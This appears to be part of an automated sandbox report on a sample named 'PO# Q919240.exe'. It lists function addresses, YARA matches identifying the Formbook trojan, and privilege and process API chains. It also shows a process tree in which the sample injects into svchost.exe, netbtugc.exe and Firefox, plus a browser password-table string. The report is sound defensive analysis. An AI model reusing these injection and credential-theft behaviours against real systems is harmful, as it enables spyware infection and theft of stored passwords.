            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039569622_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039268B82_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E8F02_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394A8402_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039428402_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BEFA02_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932FC82_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394CFE02_2_0394CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960F302_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E2F302_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03982F282_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4F402_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952E902_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FCE932_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEEDB2_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393AE0D2_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FEE262_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940E592_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03958DBF2_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DCD1F2_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394AD002_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0CB52_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930CF22_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940C002_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0398739A2_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F132D2_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392D34C2_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039452A02_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B2C02_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E12ED2_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394B1B02_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0B16B2_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392F1722_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397516C2_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EF0CC2_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039470C02_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F70E92_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF0E02_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF7B02_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F16CC2_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039856302_2_03985630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DD5B02_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A095C32_2_03A095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F75712_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B403E65_2_03B403E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A8E3F05_2_03A8E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3A3525_2_03B3A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B002C05_2_03B002C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B202745_2_03B20274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B341A25_2_03B341A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B401AA5_2_03B401AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B381CC5_2_03B381CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A701005_2_03A70100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B1A1185_2_03B1A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B081585_2_03B08158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B120005_2_03B12000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A7C7C05_2_03A7C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A807705_2_03A80770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AA47505_2_03AA4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A9C6E05_2_03A9C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B405915_2_03B40591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A805355_2_03A80535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B2E4F65_2_03B2E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B244205_2_03B24420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B324465_2_03B32446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B36BD75_2_03B36BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3AB405_2_03B3AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A7EA805_2_03A7EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A829A05_2_03A829A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B4A9A65_2_03B4A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A969625_2_03A96962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A668B85_2_03A668B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AAE8F05_2_03AAE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A8A8405_2_03A8A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A828405_2_03A82840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AFEFA05_2_03AFEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A8CFE05_2_03A8CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A72FC85_2_03A72FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B22F305_2_03B22F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AC2F285_2_03AC2F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AA0F305_2_03AA0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AF4F405_2_03AF4F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3CE935_2_03B3CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A92E905_2_03A92E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3EEDB5_2_03B3EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3EE265_2_03B3EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A80E595_2_03A80E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A98DBF5_2_03A98DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A7ADE05_2_03A7ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A8AD005_2_03A8AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B1CD1F5_2_03B1CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B20CB55_2_03B20CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A70CF25_2_03A70CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A80C005_2_03A80C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AC739A5_2_03AC739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3132D5_2_03B3132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A6D34C5_2_03A6D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A852A05_2_03A852A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B212ED5_2_03B212ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A9B2C05_2_03A9B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A8B1B05_2_03A8B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB516C5_2_03AB516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A6F1725_2_03A6F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B4B16B5_2_03B4B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3F0E05_2_03B3F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B370E95_2_03B370E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A870C05_2_03A870C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B2F0CC5_2_03B2F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3F7B05_2_03B3F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B316CC5_2_03B316CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B1D5B05_2_03B1D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B375715_2_03B37571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3F43F5_2_03B3F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A714605_2_03A71460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A9FB805_2_03A9FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03ABDBF95_2_03ABDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AF5BF05_2_03AF5BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3FB765_2_03B3FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AC5AA05_2_03AC5AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B21AA35_2_03B21AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B1DAAC5_2_03B1DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B2DAC65_2_03B2DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AF3A6C5_2_03AF3A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B37A465_2_03B37A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3FA495_2_03B3FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B159105_2_03B15910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A899505_2_03A89950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A9B9505_2_03A9B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A838E05_2_03A838E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AED8005_2_03AED800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3FFB15_2_03B3FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A81F925_2_03A81F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3FF095_2_03B3FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A89EB05_2_03A89EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A9FDC05_2_03A9FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B37D735_2_03B37D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03A83D405_2_03A83D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B31D5A5_2_03B31D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03B3FCF25_2_03B3FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AF9C325_2_03AF9C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03301A305_2_03301A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_032FCB805_2_032FCB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_032FC9605_2_032FC960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_032FC9595_2_032FC959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_032FAC005_2_032FAC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_033032595_2_03303259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_033032A05_2_033032A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0330329B5_2_0330329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_033050B05_2_033050B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0331B5F05_2_0331B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0393E3385_2_0393E338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0393E7EC5_2_0393E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0393E4535_2_0393E453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0393CB035_2_0393CB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0393CAAB5_2_0393CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0393D8585_2_0393D858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 277 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03AC7E54 appears 102 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03AEEA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03A6B970 appears 277 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03AFF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03AB5130 appears 58 times
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: String function: 00445AE0 appears 65 times
            Source: PO# Q919240.exe, 00000000.00000003.1454885763.000000000471D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO# Q919240.exe
            Source: PO# Q919240.exe, 00000000.00000003.1455742376.0000000004713000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO# Q919240.exe
            Source: PO# Q919240.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@8/6
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\PO# Q919240.exeFile created: C:\Users\user~1\AppData\Local\Temp\cuniliJump to behavior
            Source: PO# Q919240.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO# Q919240.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PO# Q919240.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000005.00000003.1955661275.0000000003677000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.0000000003677000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.1955481368.0000000003652000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2706051266.00000000036A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO# Q919240.exeReversingLabs: Detection: 71%
            Source: PO# Q919240.exeVirustotal: Detection: 73%
            Source: C:\Users\user\Desktop\PO# Q919240.exeFile read: C:\Users\user\Desktop\PO# Q919240.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO# Q919240.exe "C:\Users\user\Desktop\PO# Q919240.exe"
            Source: C:\Users\user\Desktop\PO# Q919240.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO# Q919240.exe"
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO# Q919240.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO# Q919240.exe"Jump to behavior
            Source: C:\Program Files (x86)\WsnsltApGEWEOdJiLaGflJRRMADGDinVdWMTCGqwSclPKQ\fALrZoEgBHis.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
